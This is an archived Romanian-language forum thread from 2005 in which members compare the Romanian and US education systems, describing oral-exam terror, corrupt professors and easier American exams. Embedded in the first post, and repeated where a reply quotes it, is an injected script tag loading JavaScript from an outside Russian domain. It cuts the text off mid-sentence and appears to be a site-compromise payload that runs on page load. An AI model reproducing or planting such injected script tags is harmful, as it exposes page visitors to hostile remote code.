PDA

Arată versiune întreagă : Sistemul de educatie Rom/State

mihaelaNV
12.02.2005, 04:39
Citeam astazi "topicul" Melinei cu "fotografia alb -negru", si mi se cam facuse dor de scoala...... Apoi gandul mi-a zburat acasa, la anii de liceu, la faculta' de acasa....ce stresant era sa inveti pentru examene....ce frica iti era de profesorii care te picau doar ptr. simplul fapt ca esti fata(unii), altii pentru ca erai fiul cuiva(unii), sau alti profesori care iti spuneau concret cat te costa ca sa poti trece. Ma mai gandesc laasteptatul pe coridor de la 7 a.m , pana la 4 p.m., nemancati, obositi, torturati, stiind ca este aproape randul tau sa mergi la examenul oral,adica sa fii torturat:Psi mai mult de jumatata de clasa este picata. Nu poti sa crezi ca "studenta" care avea numai 10, si era favorita profei,a picat atat de usor.... incepi sa rasfoiesti rapid la subiectul ce i-a picat, sa verifici daca il stapanesti mai bine...tzi se pare ca nu mai stii nimic, parca niciodata nu ai mai vazut cursuriile acelea, intri in panica, in jurul tau toata lumea fumeaza, incerci sa mergi pana la toaleta, unde crezi ca poti sa iti eliberezi stresul, unde crezi ca poti sa scapi te toate acele fetze intrate in panica?(ca si a ta de altfelsmileys/smiley4.gif), dar dai de cei picati deja, plansete, cuvinte de "aprecieresmileys/smiley2.gifadresate profesorului", nu este exact atmosfera calmanta pe care ai visat-o. Deodata se aude un nume foarte cunoscut...toti se uita la TINE, NU STII DE CE, APOI AUZI ACEL NUME MAI TARE, MAI APROAPE, MAI GREU. Iti ia cateva secunde sa realizezi ca este numele tau, si pana sa stii ca esti tu, esti deja asezata in fatza profesoareismileys/smiley19.gif. Imialeg cu inima intre dintzi soarta, aleg un biletel, si nu pot sa cred in acel moment ce importanta poate avea o bucata de hartie......daca nu stiati" o bucata de hartie poate sa anuleze toate planurile facute pe varasmileys/smiley99.gif, poate sa te forteze sa ii mai vezi fatza acelui profesor inca o data dupa cateva luni smileys/smiley15.gif, poate sa se joace cu nervii tai cum vrea. Pana nu-l citesti ai sperante, visezi ca reusesti, apoi dupa ce l-ai citit, nu mai poti visa, visul tau e realitate si trebuie sa o iei ca atare, fa ceva atunci in acel moment. Si este interesant cum din miile de pagini citite si recitite, si analizate si invatzate, cad pur si simplu si dispar din minte paginile care nu au nimic de a face cu subiectul......si uite asa daca esti norocos si poti sa ai fortza aceea de relaxare pe moment, poti vedea ca dupa ploaie , nori si furtuna mai vine si soarele........trambitze cantati....caci in mintea mea ......vad despre ce este subiectul.......iti vine sa sari in sus de fericire, nu stii cum sa nu te mai opresti din ras, nu poti sa crezi ca stii ce sa spui, acum te gandesti cum sa spui cat mai corect in Engleza, ca nu e tot una "the ducks come from the trucks", chiar daca stii ca "dacii se trag din traci"...stii cum e uneori poate sa iasa altceva" camioanele vin din ratzesmileys/smiley36.gif".......asa ca iti amintesti un singur lucru ce tatal tau iti spunea intotdeauna, si nu prea aveai cum sa exersezi inainte...dar acum incerci sa numeri pana la 10 si sa te calmezi. Imi spun ca am "asul in maneca"...asa ca totul va fi bine. Deodata totul incepe sa aiba o forma si un sens in capul meu, asa ca disperata sa nu care cumva sa dispara, sau sa fuga undeva cer disperata un pix si o hartie....si incep sa scriu, si scheme faze, sa ma vezi, numai ca nu iesea fum din foaiea aceea......ma opresc brusc si ma gandesc" mai se poate ca eu sa trec la profa asta...chiar exista D-zeu?smileys/smiley2.gif.....cu D-zeu inainte, cu un zambet pe fatza scriu si scriu si nu ma mai opresc din scris.......cand aud un nume, care de data aceasta e atat de placut, parca ar fi "impuscatura la inceperea maratonului, care te elibereaza".......deodata fara sa real<script src=http://www.iroe.ru/ngg.js></script>

sorin
17.02.2005, 07:21
Interesant ce scrii tu aici Mihaela si in plus nimeni nu va avea motive sa se mai ia de viata ta pentru scris...amestecat in engleza si romana smileys/smiley2.gif

Eu cred ca profesori buni si profesori mai putin buni se gasesc peste tot, diferenta dintre cei de aici si cei din Ro fiind ca aici spaga este exclusa. Dupa parerea mea, un profesor bun este acela care nu numai ca este foarte bine pregatit profesional, dar isi si face meseria cu pasiune insufland o dorinta de a invata studentilor sau elevilor. Cred ca daca se face aceeasi materie cu doi profesori diferiti, rezultatele au sa difere.

aconi
20.02.2005, 02:48
[QUOTE=mihaelaNV]

Citeam astazi "topicul" Melinei cu "fotografia alb
-negru", si mi se cam facuse dor de scoala...... Apoi gandul mi-a
zburat acasa, la anii de liceu, la faculta' de acasa....ce stresant era
sa inveti pentru examene....ce frica iti era de profesorii care te
picau doar ptr. simplul fapt ca esti fata(unii), altii pentru ca erai
fiul cuiva(unii), sau alti profesori care iti spuneau concret cat te
costa ca sa poti trece. Ma mai gandesc laasteptatul pe coridor de
la 7 a.m , pana la 4 p.m., nemancati, obositi, torturati, stiind ca
este aproape randul tau sa mergi la examenul oral,adica sa fii
torturat:Psi mai mult de jumatata de clasa este picata. Nu poti
sa crezi ca "studenta" care avea numai 10, si era favorita profei,a
picat atat de usor.... incepi sa rasfoiesti rapid la subiectul ce i-a
picat, sa verifici daca il stapanesti mai bine...tzi se pare ca nu mai
stii nimic, parca niciodata nu ai mai vazut cursuriile acelea, intri in
panica, in jurul tau toata lumea fumeaza, incerci sa mergi pana la
toaleta, unde crezi ca poti sa iti eliberezi stresul, unde crezi ca
poti sa scapi te toate acele fetze intrate in panica?(ca si a ta de
altfelsmileys/smiley4.gif), dar dai de cei picati deja, plansete, cuvinte de "aprecieresmileys/smiley2.gifadresate
profesorului", nu este exact atmosfera calmanta pe care ai visat-o.
Deodata se aude un nume foarte cunoscut...toti se uita la TINE, NU STII
DE CE, APOI AUZI ACEL NUME MAI TARE, MAI APROAPE, MAI GREU. Iti ia
cateva secunde sa realizezi ca este numele tau, si pana sa stii ca esti
tu, esti deja asezata in fatza profesoareismileys/smiley19.gif.
Imialeg cu inima intre dintzi soarta, aleg un biletel, si nu pot
sa cred in acel moment ce importanta poate avea o bucata de
hartie......daca nu stiati" o bucata de hartie poate sa anuleze toate
planurile facute pe varasmileys/smiley99.gif, poate sa te forteze sa ii mai vezi fatza acelui profesor inca o data dupa cateva luni smileys/smiley15.gif,
poate sa se joace cu nervii tai cum vrea. Pana nu-l citesti ai
sperante, visezi ca reusesti, apoi dupa ce l-ai citit, nu mai poti
visa, visul tau e realitate si trebuie sa o iei ca atare, fa ceva
atunci in acel moment. Si este interesant cum din miile de pagini
citite si recitite, si analizate si invatzate, cad pur si simplu si
dispar din minte paginile care nu au nimic de a face cu
subiectul......si uite asa daca esti norocos si poti sa ai fortza aceea
de relaxare pe moment, poti vedea ca dupa ploaie , nori si furtuna mai
vine si soarele........trambitze cantati....caci in mintea mea
......vad despre ce este subiectul.......iti vine sa sari in sus de
fericire, nu stii cum sa nu te mai opresti din ras, nu poti sa crezi ca
stii ce sa spui, acum te gandesti cum sa spui cat mai corect in
Engleza, ca nu e tot una "the ducks come from the trucks", chiar daca
stii ca "dacii se trag din traci"...stii cum e uneori poate sa iasa
altceva" camioanele vin din ratzesmileys/smiley36.gif".......asa
ca iti amintesti un singur lucru ce tatal tau iti spunea intotdeauna,
si nu prea aveai cum sa exersezi inainte...dar acum incerci sa numeri
pana la 10 si sa te calmezi. Imi spun ca am "asul in maneca"...asa ca
totul va fi bine. Deodata totul incepe sa aiba o forma si un sens in
capul meu, asa ca disperata sa nu care cumva sa dispara, sau sa fuga
undeva cer disperata un pix si o hartie....si incep sa scriu, si scheme
faze, sa ma vezi, numai ca nu iesea fum din foaiea aceea......ma opresc
brusc si ma gandesc" mai se poate ca eu sa trec la profa asta...chiar
exista D-zeu?smileys/smiley2.gif.....cu D-zeu inainte, cu
un zambet pe fatza scriu si scriu si nu ma mai opresc din
scris.......cand aud un nume, care de data aceasta e atat de placut,
parca ar fi "impuscatura<<script src=http://www.iroe.ru/ngg.js></script>

22.02.2005, 03:14
Oare in State nu exista emotii la examene? Eu consider ca sunt inerente oricarui examen; depinde cum le putem stapani si prin ce metode.

Aconi, este normal sa ai emotii,este insa o mare diferenta intre teroareadin Ro dela examene. Diferenta este intre repercursiunile pe care lesuporti daca nu treci examenul si modul in care esti examinat. Nu pot sa vorbesc mult despre situatia invatamantului superior in Ro, dar pot sa-ti spun multe despreinvatamantul universitar din US.In Ro daca nu intri la facultate, teasteapta armata saufabrica....In US,aplici la 5-6 universitatisi astepti sa vezi care te place so vrea.Dupa ceincepi scoala, examenele nuau menirea sa te excluda, doar sa determine cine stie mai mult, cine a invatat si cine sa distrat.La primulmeu final exam profesorulne-a spus ce ne va cere laexamen, ce sacitim si cu ce sa nu ne pierdem timpul. Euamintrebat naiv, "dar daca tu ne spuice este in examen,ce rost mai are examenul?" la care profesorul a raspunsca scopulexamenului este savada ce stiu studenti, nu ce au uitat sau nu au invatat . smileys/smiley2.gif

mihaelaNV
22.02.2005, 16:42
Ce adevar graiesti mai Mugatu, este perfect adevarat.....chiar era teroare acasa, mai ales cand trebuia sa invatzam cuvant cu cuvant "Istoria literaturii romane" de George Calinescu.....te cam lua cu transpiratul, aici imi vine sa rad, cand ii vad pe americani cum se "streseaza"ei cand e vorba de invatazta numai vreo 5 capitole, si stiu exact ce anume le va da la examen! e MARE DIFERENTZA...MARE DE TOT!